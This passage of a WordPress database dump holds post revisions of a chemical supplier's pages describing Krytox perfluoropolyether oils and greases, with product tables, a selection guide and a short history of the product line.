pressure (EP) conditions and should be used for slow speed or heavily loaded applications where there is no danger of the molybdenum disulfide additive reacting with chemicals or causing contamination.</td>\n<td>Typical applications include highly loaded gears, CV joints, U-joints, splined shafts, and commercial electrical switches.</td>\n</tr>\n<tr>\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-anticorrosion/">GPL 22X</a></td>\n<td>The GPL 22X series contains sodium nitrite corrosion/ anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems.</td>\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\n</tr>\n<tr>\n<td style="text-align: left;">GPL 29X</td>\n<td>The GPL 29X greases have EP and anti-corrosion additives and have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection.</td>\n<td>Typical applications include low-speed conveyor bearings that are subject to vibration, moist conditions or frequent temperature cycling that could allow condensation and rusting to occur.</td>\n</tr>\n<tr>\n<td style="text-align: left;"> GPL 2EX</td>\n<td>The GPL 2E(X) lubricants formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases but contains a non-nitrite anticorrosion additive that is the salt of an organic acid. The new additives are effective at low concentration levels, are environmentally friendly, and do not pose any restrictions on the long-term recyclability of the grease.</td>\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\n</tr>\n<tr>\n<td colspan="3">\n<h4><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/"><strong>Lubricants for Aerospace Applications</strong></a></h4>\n</td>\n</tr>\n<tr>\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/aerospace-aviation-oils/">143</a></td>\n<td colspan="2">Krytox 143 series oils are clear, colorless fluorinated synthetic oils that are non-reactive, non-flammable, safe in chemical and oxygen service, and long-lasting.</td>\n</tr>\n<tr>\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240/">240</a></td>\n<td colspan="2">Krytox 240 Series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but they are in grease form. The 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specifications. Many of the other 240 series products meet other specifications for individual applications.</td>\n</tr>\n<tr>\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-250-series/">250</a></td>\n<td colspan="2">Krytox 250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.</td>\n</tr>\n<tr>\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-283-series/">283</a></td>\n<td colspan="2">Krytox 283 series anti-corrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.</td>\n</tr>\n<tr>\n<td colspan="3">\n<h4><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/"><strong>Lubricants for Extended Performance Applications</strong></a></h4>\n</td>\n</tr>\n<tr>\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/">XP 1A series oils/XP 2A series greases</a></td>\n<td colspan="2">The XP lubricant line offers greases and oils with a soluble additive in the oil. It will not wash away or be left behind with the grease thickener. These newly patented additives enhance the performance of PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads. These products are used in any lubrication application.</td>\n</tr>\n<tr>\n<td colspan="3">\n<h4><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/"><strong>Lubricating Fluids for Vacuum Pump Applications</strong></a></h4>\n</td>\n</tr>\n<tr>\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/">Vacuum Pump Fluids</a></td>\n<td colspan="2">The Vacuum pump fluids are used in vacuum pumps and systems and are used when controlled vapor pressure, nonflammability and non-reactivity are needed. These products can be regenerated back to original properties and reused.</td>\n</tr>\n<tr>\n<td colspan="3">\n<h4><strong>L<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/">ubricants for Extra High-Temperature Applications</a></strong></h4>\n</td>\n</tr>\n<tr>\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-s-series/">XHT- S, SX</a></td>\n<td colspan="2">Special high-temperature grease with low oil evaporation that provides long bearing life and is compatible with all elastomers and plastics. It has excellent lubrication over a broad temperature range but is designed to work best at temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\n</tr>\n<tr>\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-ac/">XHT- AC, ACX</a></td>\n<td colspan="2">This grease is a special high-temperature grease with low oil evaporation that provides long bearing life and is compatible with most elastomers and plastics. Grease contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. It has excellent lubrication over a broad temperature range but is designed to work best at temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\n</tr>\n<tr>\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-bd/">XHT- BD, BDX, BDZ</a></td>\n<td colspan="2">Designed for use where the temperatures are in the 300 °C (572 °F) range and higher where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high-temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. Grease is slightly tacky and will coat the surface and stay in place. The oil in the grease can begin to slowly degrade at temperatures above 330 °C (625 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life. Maximum use temperatures for these greases are 360 °C (680 °F) with intermittent spikes to 400 °C (752 °F).</td>\n</tr>\n<tr>\n<td colspan="3">\n<h4><strong>Krytox Lubricants for Specialty Applications</strong></h4>\n</td>\n</tr>\n<tr>\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-246/">GPL 246</a></td>\n<td>GPL 206 with copper added, so it will conduct electricity.</td>\n<td></td>\n</tr>\n<tr>\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-407/">GPL 407</a></td>\n<td colspan="2">A silica thickened non-melting thickener for low-speed applications in conveyors and other such applications where temperatures might cause PTFE melting.</td>\n</tr>\n<tr>\n<td>GPL 577</td>\n<td colspan="2">A grease containing a special EP additive and anti-corrosion additives for use under high loads where corrosion might be a factor</td>\n</tr>\n<tr>\n<td><a href="https://www.miller-stephenson.com/product/krytox-lvp/">LVP</a></td>\n<td colspan="2">A special high vacuum grease for applications where outgassing must be avoided. This is used in high vacuum industries and for sealing joints in laboratory applications</td>\n</tr>\n<tr>\n<td>XP 2C5</td>\n<td colspan="2">The XP 2C5 grease contains an oil soluble additive that is effective at preventing corrosion and reducing wear. It also contains an extreme pressure additive. Typical applications include those in potentially corrosive atmospheres, where vibration or shock loading may be significant and where an element will spend more time experiencing a mixed film or boundary lubrication versus the desired full film or hydrodynamic lubrication.</td>\n</tr>\n<tr>\n<td>XHT EP 298 and EP 299</td>\n<td colspan="2">These greases have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection. Typical applications include conveyor chains that are subjected to moist conditions or frequent temperature cycling that could allow condensation and rusting to occur.</td>\n</tr>\n</tbody>\n</table>\n&nbsp;\n\nhttps://www.youtube.com/watch?v=tbzqYPsuauI\n\n<strong>\nTO BROWSE OUR KRYTOX CATALOG, SELECT A CATEGORY BELOW:</strong>\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Lubricants, Greases and Oils"]\n\n[follow twitter="https://twitter.com/MSChemicals" facebook="https://www.facebook.com/Miller-Stephenson-Chemical-Co-1158843970871033/" googleplus="https://plus.google.com/105252144916647489581" linkedin="https://www.linkedin.com/company/miller-stephenson-chemical-company"]\n\nKrytox™ is  a trademark of The Chemours Company FC, LLC.\n\n&nbsp;', 'Krytox Application Overview', '', 'inherit', 'closed', 'closed', '', '2050-autosave-v1', '', '', '2017-06-01 17:17:27', '2017-06-01 17:17:27', '', 2050, 'https://www.miller-stephenson.com/2050-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2427, 2, '2016-10-12 19:43:39', '2016-10-12 19:43:39', '<h4><strong>Which Krytox product is right for your application?</strong></h4>\nKrytox product(s) are perfluoropolyether oils and greases are available in a variety of grades for many types of applications. This Product Selection Guide provides general properties and cites the technical data reference document where additional information can be found. “Krytox Performance Lubricants Product Overview” gives basic information about all of the grades.\n\nTypical Krytox product lubricant applications include: paint plant conveyor bearings, corrugator and paper machine bearings, robotics, welding machines, high temperature fans, textile equipment, tenter frames, high temperature ovens, conveyor systems in glass and aluminum plants, textile calendar roll bearings, brick kiln car bearings, valve lubrication, ventilation fan bearings, rod mills, valves, valve actuators, automobile\nalternators, viscous fan clutches, pumps, sealed-forlife bearings, critical equipment where failure cannot be tolerated, and severe service applications.\n<h4><strong>Krytox General-Purpose Oils and Greases</strong></h4>\nThe Krytox GPL 10X oil /20X grease series contains no additives and can be used on components that may come in contact with all chemicals, including acids, bases, solvents, and other reactive chemicals. Typical applications include valves, bearings, seal barrier fluids, instruments, and oxygen systems.\n\nThe Krytox GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or heavily loaded applications.\n\nThe Krytox GPL 22X series contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments. Typical applications include automotive bearings, sealed pump bearings, electric motor bearings, and general-purpose bearings.\n\nKrytox GPL 29X greases have EP and anti-corrosion additives, and have been formulated for applications that need both high load carrying capacity and anti-corrosion protection. For additional information, refer to “Krytox Lubricants for Extreme Pressure Applications with Anti- Corrosion Additives.”\n\nKrytox GPL 2EX lubricants are formulated using new antirust additives. This grease is similar to Krytox GPL 22X series greases, but contains a non-nitrite anti-corrosion additive. For further information, refer to “Krytox Extra High Temperature (XHT) Products.”\n<h4><strong>Krytox Lubricants for Aerospace Applications</strong></h4>\nKrytox 143 series oils are clear, colorless, fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and are long lasting.\n\nKrytox 240 series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but in a grease form. Krytox 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specification.\n<h4><strong>Krytox Vacuum Pump Fluids</strong></h4>\nKrytox vacuum pump fluids are used in vacuum pumps and vacuum systems where controlled vapor pressure, nonflammability, and non-reactivity are needed. Krytox vacuum pump fluids can be regenerated and reused.\n<h4><strong>Krytox Extra High Temperature Products</strong></h4>\nKrytox XHT- S and XHT-SX greases are high temperature greases. These greases are designed to work best at temperatures over 204 °C (400 °F), but below 300 °C (572 °F). For more specific information, refer to\n“Krytox XHT Grease.”\n\nKrytox XHT- AC and XHT-ACX greases are high temperature greases that contain anti-corrosion/anti-wear inhibitors. These greases are designed to work best at temperatures over 204 °C (400 °F), but under 300 °C (572 °F).\n\nKrytox XHT- BD, XHT-BDX, and XHT-BDZ greases are designed for use where temperatures are in the 288–399 °C (550–750 °F) range and there is a danger of melting the standard PTFE thickener. These greases use a special non-melting high temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The grease is slightly tacky, and it will coat the surface and stay in place. For additional information, refer to “Krytox XHT Grease with Special Non-Melting Thickener.”\n<h4><strong>Krytox Lubricant Specialty Products</strong></h4>\nSpecialty products include:\n<ul>\n 	<li>H-1 rated food grade lubricants (discussed in more detail in “Krytox General-Purpose Greases and Oils”)</li>\n 	<li>Krytox NRT lubricants for oxygen systems and reactivegases</li>\n 	<li>Krytox XP lubricants with soluble additives</li>\n 	<li>Wide temperature range, high vacuum linear PFPE products</li>\n</ul>\n<strong>Other Considerations</strong>\n\nMany factors affect the performance of a grease and bearing, and those factors can affect grease and component life as well. Standard grease consistency is NLGI Grade 2 penetration. Sometimes, a harder Grade 3 grease or softer Grade 1 grease is needed and can be ordered. For example, softer Grade 00 or 0 greases are often used in gearboxes. In bearing applications, different types of bearings place different stresses on grease; ball bearings cause little stress, whereas roller bearings will tend to grind and work the grease severely. This stress can shorten grease life and require more frequent re-lubrication or result in the need for more viscous base oil in the grease. This Product Selection Guide is a starting point to help in the selection of the Krytox lubricant suitable for your tough applications.\n\n<strong>To view our line of Krytox products see below:</strong>\n\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Lubricants, Greases and Oils"]\n\nTo learn more about Krytox product(s) please <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">click here.</a>', 'Krytox Product Selection Guide', '', 'inherit', 'closed', 'closed', '', '2317-autosave-v1', '', '', '2016-10-12 19:43:39', '2016-10-12 19:43:39', '', 2317, 'https://www.miller-stephenson.com/2317-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2428, 2, '2016-10-07 19:50:47', '2016-10-07 19:50:47', '<strong>Which Krytox product is right for your application?</strong>\r\n\r\nKrytox product(s) are perfluoropolyether oils and greases are available in a variety of grades for many types of applications. This Product Selection Guide provides general properties and cites the technical data reference document where additional information can be found. “Krytox Performance Lubricants Product Overview” gives basic information about all of the grades.\r\nTypical Krytox product lubricant applications include: paint plant conveyor bearings, corrugator and paper machine bearings, robotics, welding machines, high temperature fans, textile equipment, tenter frames, high temperature ovens, conveyor systems in glass and aluminum plants, textile calendar roll bearings, brick kiln car bearings, valve lubrication, ventilation fan bearings, rod mills, valves, valve actuators, automobile\r\nalternators, viscous fan clutches, pumps, sealed-forlife bearings, critical equipment where failure cannot be tolerated, and severe service applications.\r\n\r\n<strong>Krytox General-Purpose Oils and Greases</strong>\r\n\r\nThe Krytox GPL 10X oil /20X grease series contains no additives and can be used on components that may come in contact with all chemicals, including acids, bases, solvents, and other reactive chemicals. Typical applications include valves, bearings, seal barrier fluids, instruments, and oxygen systems.\r\n\r\nThe Krytox GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or heavily loaded applications.\r\n\r\nThe Krytox GPL 22X series contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments. Typical applications include automotive bearings, sealed pump bearings, electric motor bearings, and general-purpose bearings.\r\n\r\nKrytox GPL 29X greases have EP and anti-corrosion additives, and have been formulated for applications that need both high load carrying capacity and anti-corrosion protection. For additional information, refer to “Krytox Lubricants for Extreme Pressure Applications with Anti- Corrosion Additives.”\r\n\r\nKrytox GPL 2EX lubricants are formulated using new antirust additives. This grease is similar to Krytox GPL 22X series greases, but contains a non-nitrite anti-corrosion additive. For further information, refer to “Krytox Extra High Temperature (XHT) Products.”\r\n\r\n<strong>Krytox Lubricants for Aerospace Applications</strong>\r\n\r\nKrytox 143 series oils are clear, colorless, fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and are long lasting.\r\n\r\nKrytox 240 series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but in a grease form. Krytox 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specification.\r\n\r\n<strong>Krytox Vacuum Pump Fluids</strong>\r\n\r\nKrytox vacuum pump fluids are used in vacuum pumps and vacuum systems where controlled vapor pressure, nonflammability, and non-reactivity are needed. Krytox vacuum pump fluids can be regenerated and reused.\r\n\r\n<strong>Krytox Extra High Temperature Products</strong>\r\n\r\nKrytox XHT- S and XHT-SX greases are high temperature greases. These greases are designed to work best at temperatures over 204 °C (400 °F), but below 300 °C (572 °F). For more specific information, refer to\r\n“Krytox XHT Grease.”\r\n\r\nKrytox XHT- AC and XHT-ACX greases are high temperature greases that contain anti-corrosion/anti-wear inhibitors. These greases are designed to work best at temperatures over 204 °C (400 °F), but under 300 °C (572 °F).\r\n\r\nKrytox XHT- BD, XHT-BDX, and XHT-BDZ greases are designed for use where temperatures are in the 288–399 °C (550–750 °F) range and there is a danger of melting the standard PTFE thickener. These greases use a special non-melting high temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The grease is slightly tacky, and it will coat the surface and stay in place. For additional information, refer to “Krytox XHT Grease with Special Non-Melting Thickener.”\r\n\r\n<strong>Krytox Lubricant Specialty Products</strong>\r\n\r\nSpecialty products include:\r\n<ul>\r\n 	<li>H-1 rated food grade lubricants (discussed in more detail in “Krytox General-Purpose Greases and Oils”)</li>\r\n 	<li>Krytox NRT lubricants for oxygen systems and reactivegases</li>\r\n 	<li>Krytox XP lubricants with soluble additives</li>\r\n 	<li>Wide temperature range, high vacuum linear PFPE products</li>\r\n</ul>\r\n<strong>Other Considerations</strong>\r\n\r\nMany factors affect the performance of a grease and bearing, and those factors can affect grease and component life as well. Standard grease consistency is NLGI Grade 2 penetration. Sometimes, a harder Grade 3 grease or softer Grade 1 grease is needed and can be ordered. For example, softer Grade 00 or 0 greases are often used in gearboxes. In bearing applications, different types of bearings place different stresses on grease; ball bearings cause little stress, whereas roller bearings will tend to grind and work the grease severely. This stress can shorten grease life and require more frequent re-lubrication or result in the need for more viscous base oil in the grease. This Product Selection Guide is a starting point to help in the selection of the Krytox lubricant suitable for your tough applications.\r\n\r\n<strong>To view our line of Krytox products see below:</strong>\r\n\r\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Lubricants, Greases and Oils"]\r\n\r\nTo learn more about Krytox product(s) please <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">click here.</a>', 'Krytox Product Selection Guide', '', 'inherit', 'closed', 'closed', '', '2317-revision-v1', '', '', '2016-10-07 19:50:47', '2016-10-07 19:50:47', '', 2317, 'https://www.miller-stephenson.com/2317-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2429, 2, '2016-10-07 19:54:52', '2016-10-07 19:54:52', 'Discovered in 1959, the polymer that would become known worldwide as Krytox showed remarkable thermal and oxidative stability. Potential uses envisioned then included lubricant for the MACH 3+ turbine engine, hydraulic oil, rocket gear box lubricant, and even gyroscope oil.\r\n\r\nIn 1963, Krytox oil was used in a GE engine test for the supersonic transport aircraft. In 1964, new perfluoropolyether (PFPE)-based grease formulations were developed jointly with the U.S. Navy and Air Force, resulting in military specification MIL-G-27617, which was developed specifically for Krytox. The first commercial sales of Krytox were for nonflammable lubricants for the Apollo space program in 1965.\r\n\r\nPrior to 1981, the only commercially available Krytox lubricants were aerospace oil and greases. Since then, PFPE-based oils and greases have been adopted across a very wide range of industries and applications. There are PFPE oils and greases for industrial operations, vacuum pump fluids, incidental food contact, automotive uses, reactive gas, and, of course, military applications—to name just a few.\r\n\r\nToday, of course, it’s our well-known trademark for high performance synthetic lubricants used for a variety of applications. The oils are made from only fluorine, carbon, and oxygen—a mixture of compounds collectively known by many names—including PFPE, perfluoroalkylether (PFAE), and perfluoropolyalkylether (PFPAE). These perfluorinated oils and greases deliver high performance, perform at wide temperature ranges, and provide superior quality lubrication under extreme conditions in comparison to hydrocarbon alternatives. And, with a global distribution network and world-class technical service, it is the lubricant of choice for extreme conditions and performance.\r\n\r\nThe use of Chemours unique PTFE thickener provides superior chemical and thermal stability to all Krytox grease product lines. Many greases are also available with additional anti-wear and anti-corrosion additives to further boost performance in critical operations.\r\n\r\nKrytox performance lubricants provide superior performance and extended life as lubricants, sealants, and dielectrics. With exceptional performance and reliability in the toughest conditions—where productivity matters and downtime costs, it can contribute significantly to lowering the cost of doing business.\r\n<table width="1455">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="3" width="1455"><b>Krytox Performance Lubricants</b></td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">General Purpose Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">GPL 10X Oil / 20X Grease</a></td>\r\n<td>The GPL 10X oil/20X grease series contains no additives and can be used on components that come in contact with chemicals.</td>\r\n<td>Typical applications include valves or bearings in contact with chemicals, seal barrier fluids, instruments, and oxygen systems.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-gpl-extreme-pressure/">GPL 21X</a></td>\r\n<td>The GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or heavily loaded applications where there is no danger of the molybdenum disulfide additive reacting with chemicals or causing contamination.</td>\r\n<td>Typical applications include highly loaded gears, CV joints, U-joints, splined shafts, and commercial electrical switches.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-anticorrosion/">GPL 22X</a></td>\r\n<td>The GPL 22X series contains sodium nitrite corrosion/ anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and generalpurpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">GPL 29X</td>\r\n<td>The GPL 29X greases have EP and anti-corrosion additives and have been formulated for high temperature applications that need both high load carrying capacity and anti-corrosion protection.</td>\r\n<td>Typical applications include slow-speed conveyor bearings that are subjected to vibration, moist conditions, or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"> GPL 2EX</td>\r\n<td>The GPL 2E(X) lubricants are formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases, but contains a non-nitrite anticorrosion additive that is the salt of an organic acid. The new additives are effective at low concentration levels, are environmentally friendly, and do not pose any restrictions on long-term recyclability of the grease.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and generalpurpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/"><strong>Lubricants for Aerospace Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox 143</td>\r\n<td colspan="2">Krytox 143 series oils are clear, colorless fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and long-lasting.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox 240</td>\r\n<td colspan="2">Krytox 240 series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but they are in grease form. The 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specifications. Many of the other 240 series products meet other specifications for individual applications.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox 250</td>\r\n<td colspan="2">Krytox 250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox 283</td>\r\n<td colspan="2">Krytox 283 series anti-corrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/"><strong>Lubricants for Extended Performance Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XP 1A series oils/XP 2A series greases</td>\r\n<td colspan="2">The XP lubricant line offers greases and oils with a soluble additive in the oil. It will not be washed away or left behind with the grease thickener. These new patented additives enhance the performance of PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads. These products can be used in any lubrication application.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/"><strong>Lubricating Fluids for Vacuum Pump Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox Vacuum Pump Fluids</td>\r\n<td colspan="2">The Vacuum pump fluids are used in vacuum pumps and systems, and are used when controlled vapor pressure, nonflammability and non-reactivity are needed. These products can be regenerated back to original properties and reused.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>L<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/">ubricants for Extra High Temperature Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XHT- S, SX</td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with all elastomers and plastics. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XHT- AC, ACX</td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with most elastomers and plastics. This grease contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XHT- BD, BDX, BDZ</td>\r\n<td colspan="2">This grease is designed for use where the temperatures are in the 300 °C (572 °F) range and higher where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. The grease is slightly tacky and will coat the surface and stay in place. The oil in the grease can begin to slowly degrade at temperatures above 330 °C (625 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life. Maximum use temperatures for these greases are 360 °C (680 °F) with intermittent spikes to 400 °C (752 °F).</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Specialty Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 246</td>\r\n<td>GPL 206 with copper added, so it will conduct electricity.</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 407</td>\r\n<td colspan="2">A silica thickened non-melting thickener for low speed applications in conveyors and other such applications where temperatures might cause PTFE melting.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 577</td>\r\n<td colspan="2">A grease containing a special EP additive and anti-corrosion additives for use under high loads where corrosion might be a factor</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox LVP</td>\r\n<td colspan="2">A special high vacuum grease for applications where outgassing must be avoided. This is used in high vacuum industries and for sealing joints in laboratory applications</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XP 2C5</td>\r\n<td colspan="2">The XP 2C5 grease contains an oil soluble additive that is effective at preventing corrosion and reducing wear. It also contains an extreme pressure additive. Typical applications include those in potentially corrosive atmospheres, where vibration or shock loading may be significant and where an element will spend more time experiencing mixed film or boundary lubrication versus the desired full film or hydrodynamic lubrication.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XHT EP 298 and EP 299</td>\r\n<td colspan="2">These greases have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection. Typical applications include conveyor chains that are subjected to moist conditions or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>\r\nTO BROWSE OUR KRYTOX CATALOG, SELECT A CATEGORY BELOW:</strong>\r\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Lubricants, Greases and Oils"]', 'Krytox Application Overview', '', 'inherit', 'closed', 'closed', '', '2050-revision-v1', '', '', '2016-10-07 19:54:52', '2016-10-07 19:54:52', '', 2050, 'https://www.miller-stephenson.com/2050-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2430, 0, '2016-10-07 20:27:47', '2016-10-07 20:27:47', '', '', '', 'publish', 'closed', 'closed', '', '2430', '', '', '2016-10-07 20:27:47', '2016-10-07 20:27:47', '', 0, 'https://www.miller-stephenson.com/nf_sub/2430/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2431, 0, '2016-10-07 20:48:04', '2016-10-07 20:48:04', '', '', '', 'publish', 'closed', 'closed', '', '2431', '', '', '2016-10-07 20:48:04', '2016-10-07 20:48:04', '', 0, 'https://www.miller-stephenson.com/nf_sub/2431/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2432, 0, '2016-10-08 12:31:21', '2016-10-08 12:31:21', '', '', '', 'publish', 'closed', 'closed', '', '2432', '', '', '2016-10-08 12:31:21', '2016-10-08 12:31:21', '', 0, 'https://www.miller-stephenson.com/nf_sub/2432/', 0, 'nf_sub', '', 0); 
